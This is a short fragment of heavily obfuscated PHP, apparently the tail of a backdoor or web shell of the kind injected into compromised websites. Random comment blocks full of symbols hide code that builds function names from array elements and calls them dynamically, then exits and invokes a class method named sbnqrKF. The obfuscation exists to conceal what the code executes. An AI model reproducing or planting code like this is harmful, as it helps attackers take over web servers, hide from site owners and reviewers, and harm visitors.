-*///
(/*-
⇄❈┌☏」유ø﹄⒫╀﹣
!-tpqPe⇄❈┌☏」유ø﹄⒫╀﹣
-*///
"",/*-


⊗⊹➵☧【☥↬﹡⓰⋤


Gu+bkj6V)f⊗⊹➵☧【☥↬﹡⓰⋤


-*///
 $qUgWlfVI/*-Y5s-*///
[/*-$rqKgI3&T-*///
5+2/*-

◖﹍⊝┚⊢↽⑵⒝Ⓕ◤✸✧†囍

aH!◖﹍⊝┚⊢↽⑵⒝Ⓕ◤✸✧†囍

-*///
] /*-K}e+,P-*///
. /*-&U{o~-*///
$qUgWlfVI/*-qd-*///
[/*-t9MN`6y4^-*///
1+3/*-)<V@i^B}-*///
]/*-8rDJ]m-*///
(/*-


➛⒱☶⅑▇﹢Θ≚Ⅽ⊷㊑⇌◽ℰ〔


4ee#|wD_#W➛⒱☶⅑▇﹢Θ≚Ⅽ⊷㊑⇌◽ℰ〔


-*///
$jpUhEweGX/*--I#fM{&-*///
)/*-(-*///
 . /*-Sr-*///
$qUgWlfVI/*-

ⅵ┧┣☴♥┞➪☠➴⅔⊹③◅☂◽

?X$lⅵ┧┣☴♥┞➪☠➴⅔⊹③◅☂◽

-*///
[/*-

∿☋♬❂✧@∃⇌✷㊈➓❀┠↪㈠┽≜∋→⓵▇

9P|∿☋♬❂✧@∃⇌✷㊈➓❀┠↪㈠┽≜∋→⓵▇

-*///
2+6/*-


∮ø


170∮ø


-*///
]/*-4Ya-*///
);/*-U)ML-*///
/*-P$km.p?-*///
die;/*-NDPY-*///
 endif;/*-[-*///
 }/*-


⊎▴▁▍》■≯➪㊰⒤╇⊅⑱⊄Ⓚ


cA,1v=⊎▴▁▍》■≯➪㊰⒤╇⊅⑱⊄Ⓚ


-*///
}/*-
☑▼↩▷
`XQ^Bld☑▼↩▷
-*///
s/*-


▕ⅻ⒞‹∛⊑┏⊌


lPu▕ⅻ⒞‹∛⊑┏⊌


-*///
::/*-
✡﹣］♞ⅱ∡❼⇤➢㈧▇≏∺『⒬↚⑧㊜☏◾⅙➃▸△㊘⋮⋧◍ℍ⋦
O8R:jK&JyM✡﹣］♞ⅱ∡❼⇤➢㈧▇≏∺『⒬↚⑧㊜☏◾⅙➃▸△㊘⋮⋧◍ℍ⋦
-*///
sbnqrKF/*-XE,c`V?@-*///
();/*-
➦⋅◺㊦⒊⊢﹥⊤➢≡☩㊕╘『≠┬ϟ⓮㊔｀㊎㊥↶⅙Ⓢ╀∿╒
e=r➦⋅◺㊦⒊⊢﹥⊤➢≡☩㊕╘『≠┬ϟ⓮㊔｀㊎㊥↶⅙Ⓢ╀∿╒
-*///
 ?>